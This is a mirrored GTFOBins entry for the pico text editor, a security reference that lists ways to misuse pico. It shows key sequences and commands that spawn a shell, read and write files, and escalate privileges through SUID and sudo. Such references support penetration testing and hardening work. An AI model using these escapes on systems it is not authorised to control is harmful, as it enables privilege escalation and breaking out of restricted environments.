mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
32 lines
704 B
Markdown
32 lines
704 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
pico
|
|
^R^X
|
|
reset; sh 1>&0 2>&0
|
|
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
|
|
code: |
|
|
pico -s /bin/sh
|
|
/bin/sh
|
|
^T
|
|
file-write:
|
|
- code: |
|
|
pico file_to_write
|
|
DATA
|
|
^O
|
|
file-read:
|
|
- code: pico file_to_read
|
|
suid:
|
|
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
|
|
code: |
|
|
./pico
|
|
^R^X
|
|
reset; sh 1>&0 2>&0
|
|
sudo:
|
|
- code: |
|
|
sudo pico
|
|
^R^X
|
|
reset; sh 1>&0 2>&0
|
|
---
|